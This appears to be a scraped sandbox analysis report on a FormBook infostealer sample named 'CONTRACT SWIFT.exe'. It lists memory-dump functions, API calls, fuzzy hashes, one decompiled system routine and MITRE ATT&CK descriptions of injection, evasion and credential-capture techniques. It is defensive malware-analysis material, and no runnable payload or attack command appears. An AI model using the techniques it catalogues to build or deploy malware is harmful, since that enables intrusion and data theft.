Source File: 0000000A.00000002.585684006.0000000003750000.00000040.00000001.sdmp, Offset: 03750000, based on PE: true

Associated: 0000000A.00000002.585949243.000000000386B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.585958864.000000000386F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 726e6be6b48214120315cc20c48f05d9c2240995abdffed01043a540013693e2
Instruction ID: 32d1e1a76e056fd4c37c499db46bedca528f1f9cc825c0566b9d901e24b5890d
Opcode Fuzzy Hash: 726e6be6b48214120315cc20c48f05d9c2240995abdffed01043a540013693e2
Instruction Fuzzy Hash: 649002A1212084075225B1594414616404A97E4341B51C039E10045D0DC6658C917165

Uniqueness

Uniqueness Score: -1.00%

Function 03146EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 03146F88

Strings

wininet.dll, xrefs: 03146F3E, 03146F47
net.dll, xrefs: 03146F51, 03146FD7, 03146FAF, 03146FBB, 03146FE3

Memory Dump Source

Source File: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 0778681e990b22e200dd50510722491c1f6194146e74d05d0af3cffde3802e89
Instruction ID: 5a26f1ef2a10de13936c42761f9cb0d8c5ca04ccce4439b8110912dcf04d460f
Opcode Fuzzy Hash: 0778681e990b22e200dd50510722491c1f6194146e74d05d0af3cffde3802e89
Instruction Fuzzy Hash: B1319EB5602704ABC725DFA8C8B0FA7B7B8BB89704F04851DF65A6B241D770A445CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03146ED6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 03146F88

Strings

wininet.dll, xrefs: 03146F3E, 03146F47
net.dll, xrefs: 03146F51, 03146FAF, 03146FBB

Memory Dump Source

Source File: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 7f2b35ac69c4cf1aca556e1cfa5801028d41d02dad4a1e723919c10f443bea2b
Instruction ID: f13e0b27b490cf50bde251456afd4a065c6a990439334872b5a02ae94bd7ee44
Opcode Fuzzy Hash: 7f2b35ac69c4cf1aca556e1cfa5801028d41d02dad4a1e723919c10f443bea2b
Instruction Fuzzy Hash: 86319EB5602701ABD714DF64C8A0FABB7B4FB89704F04846DF6596B241D770A455CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 031484C3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03133B93), ref: 031484FD

Strings

.z`, xrefs: 031484EC, 031484F8

Memory Dump Source

Source File: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 7b6387eb0fb2316bbc11e95912f751a0bf74043020457c1f007a729ed7a5196a
Instruction ID: f5c8504857d871185208e657fa682a7fccdf7392da8456648b98951088b0d0c3
Opcode Fuzzy Hash: 7b6387eb0fb2316bbc11e95912f751a0bf74043020457c1f007a729ed7a5196a
Instruction Fuzzy Hash: 77F0ED722142106BCB25DF64CC88EE77BA8AF98240F044594F94C9B241C630E910CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 031484D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03133B93), ref: 031484FD

Strings

.z`, xrefs: 031484EC, 031484F8

Memory Dump Source

Source File: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: d89892b5ce899f9a99d442eeffce059091462bc9ecf1ef26b4687fe11b0d2bc0
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 94E046B6200308ABDB18EF99CC48EA777ACEF88750F018558FE085B241CA31F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 03137260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 031372BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 031372DB

Memory Dump Source

Source File: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction ID: 55b057116de9fd25134f9d08f47729124988b7a1503c45194f5b1a5a9543af8f
Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction Fuzzy Hash: B8018F75A8032877E720E6948C02FFEB66C9B49A50F150159FF04BE1C0E7A4A90686E5

Uniqueness

Uniqueness Score: -1.00%

Function 03139B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 03139B92

Memory Dump Source

Source File: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: d41ab918cb7379291deeb4577dbf0f84b69da8d7a86d9f98db8fca06d49ff68b
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: 02011EB9D4020DABDF10DBE4DC41F9EB7B89F58208F044195A908AB244F771E714CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03139B18, Relevance: 1.5, APIs: 1, Instructions: 47libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 03139B92

Memory Dump Source

Source File: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 0320491738ebc954579f3e59615b27c6cdd4cf036a46c4766044c19f316262e4
Instruction ID: afb7bb0b4c73e4acf08c1252bfad08e5fa745d1ac789a1b16819b7405d8c161f
Opcode Fuzzy Hash: 0320491738ebc954579f3e59615b27c6cdd4cf036a46c4766044c19f316262e4
Instruction Fuzzy Hash: 79017CB9D4020DBBDF10EBA4DC41FDDB778AB48608F008194E9089B244F771E748CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0314853E, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 03148594

Memory Dump Source

Source File: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: af100d4cd3263bfc2884311dcd1e6a64882643c7cbd9c97cd8efcc479dde9223
Instruction ID: 00539691f16e5162eac797e710d8b594cf929177892622d764fe99f622232701
Opcode Fuzzy Hash: af100d4cd3263bfc2884311dcd1e6a64882643c7cbd9c97cd8efcc479dde9223
Instruction Fuzzy Hash: DD01AFB2211108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03148540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 03148594

Memory Dump Source

Source File: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 98b0d8c70391144eb2d61cd1ea390324ba9278877ac0522726309d413b808e3e
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 7101AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 03147010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0313CCD0,?,?), ref: 0314704C

Memory Dump Source

Source File: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
Instruction ID: fea1cb6925fcb01b17e1f124fe953bdadff2976c777191606e22e52de4bb616d
Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
Instruction Fuzzy Hash: 9EE092373913043BE730A599AC02FA7B39CCB85B20F540026FB0DEB2C1DA95F80142A8

Uniqueness

Uniqueness Score: -1.00%

Function 03148621, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0313CFA2,0313CFA2,?,00000000,?,?), ref: 03148660

Memory Dump Source

Source File: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: cd4fe8b202de37f0c6657ae59abbd91eb90e8dcb8645fdbff46781f16e9fe5e7
Instruction ID: be8ce076e27d7cdf1792674bb82698f697ebe1c80c85f6045a28c4e4c63c6db2
Opcode Fuzzy Hash: cd4fe8b202de37f0c6657ae59abbd91eb90e8dcb8645fdbff46781f16e9fe5e7
Instruction Fuzzy Hash: 71F065762013486BCB20DF54DC45EEB7BA9AF44260F118559FD1D67741C631E815CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 03148630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0313CFA2,0313CFA2,?,00000000,?,?), ref: 03148660

Memory Dump Source

Source File: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: c3969172277953d3a02aa51720cc91caeb3c51ad4e9ffbc7f98387729bd461db
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 95E01AB52002086BDB10EF49CC84EE737ADAF88650F018554FA085B241CA31E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0313D410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,03137C63,?), ref: 0313D43B

Memory Dump Source

Source File: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: b715b9c96910c07fe18b29664029cf692d8c2b46a7771b25754e785cf7a7a52d
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: CDD0A7757503043BE710FBA89C03F2672CC5B59A00F494064F949EB3C3DE50F4104561

Uniqueness

Uniqueness Score: -1.00%

Function 037B967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037B9694

Memory Dump Source

Source File: 0000000A.00000002.585684006.0000000003750000.00000040.00000001.sdmp, Offset: 03750000, based on PE: true

Associated: 0000000A.00000002.585949243.000000000386B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.585958864.000000000386F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f312d35de46e18f42aa9c4ad645af48bd0bc3b5adf3fefac37ff81b9323cd87e
Instruction ID: d1544a0d21a0d877a846f95f9be98e9882474026cc30215e177b4e69e8617a05
Opcode Fuzzy Hash: f312d35de46e18f42aa9c4ad645af48bd0bc3b5adf3fefac37ff81b9323cd87e
Instruction Fuzzy Hash: 20B09B719014C5C9E721D760460C717795477D5745F26C076D3120681A4778C491F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0380FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0380FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E037BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03805720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03805720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0380fdda
0x0380fde2
0x0380fde5
0x0380fdec
0x0380fdfa
0x0380fdff
0x0380fe0a
0x0380fe0f
0x0380fe17
0x0380fe1e
0x0380fe19
0x0380fe19
0x0380fe19
0x0380fe20
0x0380fe21
0x0380fe22
0x0380fe25
0x0380fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0380FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0380FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0380FE01

Memory Dump Source

Source File: 0000000A.00000002.585684006.0000000003750000.00000040.00000001.sdmp, Offset: 03750000, based on PE: true

Associated: 0000000A.00000002.585949243.000000000386B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.585958864.000000000386F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: ece91db59af0097c8efe696f98340fdb45478f16d4fb1c5219af34678509b5c5
Instruction ID: 7464079f78abd3031e20660706e9ba37e2ddbb7215e17e3955b6ae5ea14ed23b
Opcode Fuzzy Hash: ece91db59af0097c8efe696f98340fdb45478f16d4fb1c5219af34678509b5c5
Instruction Fuzzy Hash: 91F0FC76204201BFDA605A85DC06F23BB6AEB45730F144354F628991D1D962F82096F1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report CONTRACT SWIFT.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution